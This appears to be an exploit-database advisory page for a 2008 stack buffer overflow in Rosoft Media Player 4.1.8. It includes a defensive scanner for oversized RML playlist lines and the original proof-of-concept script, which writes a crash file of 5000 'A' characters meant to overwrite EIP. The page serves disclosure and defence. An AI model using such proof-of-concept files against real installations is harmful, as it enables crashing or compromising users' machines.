Vendor: Media Player
By: Wiktor Sierocinski
CVSS: 7.5 HIGH
Stack Based Buffer Overflow
CWE: 119
Product Name: Media Player
Affected Version From: 4.1.2008
Affected Version To: 4.1.2008
Patch Exists: Yes
Related CWE: N/A
CPE: a:rosoft:media_player:4.1.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Stack Based Buffer Overflow Vulnerability in Rosoft Media Player 4.1.8

This is a stack-based buffer overflow vulnerability in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian. The flaw concerns RML files and allows EIP to be overwritten. The proof of concept below creates an RML file containing a line of 5000 "A" characters.

Mitigation:

Update to the latest version of Rosoft Media Player, or use an alternative media player.
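
A defensive check to pair with this mitigation, as an added example (not code from the original advisory or from the vendor): it flags RML files whose lines are far longer than a plausible playlist entry. The 1024-byte limit, the filler heuristic and all function names are assumptions, since the page does not state the size of the overflowed buffer.

```python
# Added example: triage scanner for playlist files with oversized entries.
import os

# Assumption: no legitimate playlist entry exceeds this many bytes.
MAX_LINE_BYTES = 1024
# Assumption: a long line built from very few distinct bytes is filler, not a path.
MIN_DISTINCT_BYTES = 8


def scan_rml(data, max_line=MAX_LINE_BYTES):
    """Return (line_number, length, reason) findings for raw file bytes."""
    findings = []
    for number, line in enumerate(data.splitlines(), start=1):
        if len(line) <= max_line:
            continue
        reason = "oversized line"
        if len(set(line)) < MIN_DISTINCT_BYTES:
            reason = "oversized line of repeated filler bytes"
        findings.append((number, len(line), reason))
    return findings


def scan_tree(root, extensions=(".rml",)):
    """Walk a directory and map each flagged playlist path to its findings."""
    flagged = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(folder, name)
            with open(path, "rb") as handle:
                findings = scan_rml(handle.read())
            if findings:
                flagged[path] = findings
    return flagged


# Constructed samples: a benign playlist and one shaped like the file described above.
BENIGN = b"#EXTINF:Played=0\nC:\\Music\\track01.mp3\n"
SUSPECT = b"#EXTINF:Played=0\n" + b"A" * 5000 + b"\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, scan_rml(sample))
```

Run `scan_tree` over download or mail-attachment directories before files reach the player; tune `MAX_LINE_BYTES` to the longest path your environment legitimately uses.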

Exploit-DB raw data:

Description:
This is nothing special - there is just a flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian.
This one concerns RML file. This is Stack Based Buffer Overflow vulnerability - we can overwrite EIP. I hope that it was not reported before.

Author: Wiktor Sierocinski
POC:

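#!/usr/bin/python

# Playlist header line followed by a single line of 5000 "A" characters
content = (
"#EXTINF:Played=0\n" + "A" * 5000 + "\n"
)

# Write the RML file; the with-block closes it on exit
with open("music.rml", "w") as fd:
    fd.write(content)

print("RML FILE CREATED")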

# milw0rm.com [2008-03-15]